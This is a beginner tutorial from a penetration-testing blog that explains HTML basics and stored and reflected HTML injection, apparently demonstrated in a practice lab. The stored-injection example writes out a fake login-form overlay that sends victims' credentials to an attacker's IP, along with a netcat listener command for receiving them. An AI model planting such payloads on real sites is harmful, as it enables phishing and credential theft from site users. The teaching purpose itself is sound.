Quantcast
Channel: Penetration Testing Archives - Hacking Articles
Viewing all articles
Browse latest Browse all 812

Beginner Guide to HTML Injection

$
0
0

From W3schools

HTML is the standard Hyper Text Markup Language which use for designing Web pages

  • HTML describes the structure of Web pages using markup.
  • HTML elements are the building blocks of HTML pages.
  • HTML elements are represented by tags.
  • HTML tags label pieces of content such as “heading”, “paragraph”, “table”, and so on.
  • Browsers do not show the HTML tags, but utilize them to submit the content of the page.

HTML Tags

HTML tags are element names surrounded by angle brackets. Their two types of tag starting also known as opening tag and end tag also known as closing tag.

HTML Elements

An HTML element usually consists of a start tag and end tag, with the content inserted in between:

HTML Attributes

Attributes provide additional information about HTML elements. Attributes generally come in form of name/value pairs like: name=”value”

Create web page using html

Generally “Notepad” is use for writing HTML code and save the text file with .html/.htm extension for example “test.html” then open the saved file using any web browser.

To create a simple web page type following code inside notepad and save test.html

<!DOCTYPE html>

<html>

<head>

<title> HTML TUTORIALS</title>

</head>

<body bgcolor=”pink”>

<br>

<center><h2>WELCOME TO HACKING ARTILCES </h2>

<br>

<p>Author “Raj chandel”</p>

</center>

</body>

</html

When you will open test.html in web browser you will see given below image.

The <!DOCTYPE html> declaration defines this document to be HTML5

The <html> element is the root element of an HTML page

The <head> element contains meta information about the document

The <title> element specifies a title for the document

The <body> element contains the visible page content; have bgcolor attribute as “pink”

The <br>element defines break line/next line

The <h1> element defines a large heading

The <p> element defines a paragraph

HTML Versions

Since the early days of the web, there have been many versions of HTML:

Version Year
HTML 1991
HTML 2.0 1995
HTML 3.2 1997
HTML 4.01 1999
XHTML 2000
HTML5 2014

To learn more about HTML visit to w3schools.com

HTML injection

HTML injection is the vulnerability inside any website that occurs when the user input is not correctly sanitized and the output is not encoded and attacker is able to inject valid HTML code into a vulnerable web page. There are so many techniques which could be use element and attributes to submit HTML content.

If these methods are provided with an untrusted input, then there is a high risk of XSS, specifically an HTML injection one. If strings are not correctly sanitized the problem could lead to XSS based HTML injection.

This vulnerability can have many consequences, like disclosure of a user’s session cookies that could be used to impersonate the victim, or, more generally, it can allow the attacker to modify the page content seen by the victims.

Their two type of html injection as following:

  • Stored HTML
  • Reflected HTML

Stored HTML

A stored HTML also known as Persistence because through this vulnerability the injected malicious script get permanently stored inside the webserver and the application server give out it back to the user when he visits the respective website. Hence when the client will click on payload which appears as an official part of the website, the injected HTML code will get execute by the browser. The most common example is comment option on blogs, which allow the users to POST their comment for administer or other user.

Example:

An example of a web application vulnerable to stored HTML injection which allow users to submit their entry in blog as shown in the screenshot.

Firstly user “raj” had made a normal entry as attacker which is successfully added in web server database.

Enter following html code inside given text area for making HTML attack.  

<div style=”position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:white; padding: 1em;”>Please login with valid credentials:<br><form name=”login” action=”http://192.168.1.104 /login.htm”><table><tr><td>Username:</td><td><input type=”text” name=”username”/></td></tr><tr><td>Password:</td><td><input type=”text” name=”password”/></td></tr><tr><td colspan=2 align=center><input type=”submit” value=”Login”/></td></tr></table></form></div>

Above HTML code will generate a payload to create user login page on targeted web page and forward that credential to attacker’s IP.

You can see given below login page look valid to user and get stored inside web server.

Now when victim will open the malicious login page he will receive above web page which looks official to him and he will submit his credential in that page. As he will do so the request will be forward on attacker IP address.

nc -vlp 80

Attacker will receive users credential as response on natcat. From screenshot you can read username=bee & password=bug

Now attacker will use these credential for login.

Reflected HTML

 The reflected HTML HTML is also known as Non Persistence is occurs when the web application respond immediately on user’s input without validating the inputs this lead an attacker to injects browser executable code inside the single HTML response. It’s named as “non-persistent” since the malicious script does not get stored inside the web server, therefore attacker will send the malicious link through phishing to trap the user.

 The most common applying of this kind of vulnerability is in Search engines in website: the attacker writes some arbitrary HTML code in the search textbox and, if the website is vulnerable, the result page will return the result of these HTML entities.

 Example:

Following web page allow user to submit his first and last name but these text field are vulnerable to HTML injection.

Now type following html code in the text field given for first name which create a link for hackingarticles.in when you click on “RAJ”

 <h1><a href =”http://www.hackingarticles.in”>RAJ</a></h1>

Similarly type following code in given text field for last name:

 <h2>CHANDEL</h2>

Click on Go tab to execute this as first and last name.

From given screenshot you can see it has submitted RAJ CHANDEL and the word “RAJ” contains a link for hackingarticles.in, when you will click on link it will forwarded to hackingarticles.in

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Beginner Guide to HTML Injection appeared first on Hacking Articles.


Viewing all articles
Browse latest Browse all 812

Trending Articles



<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>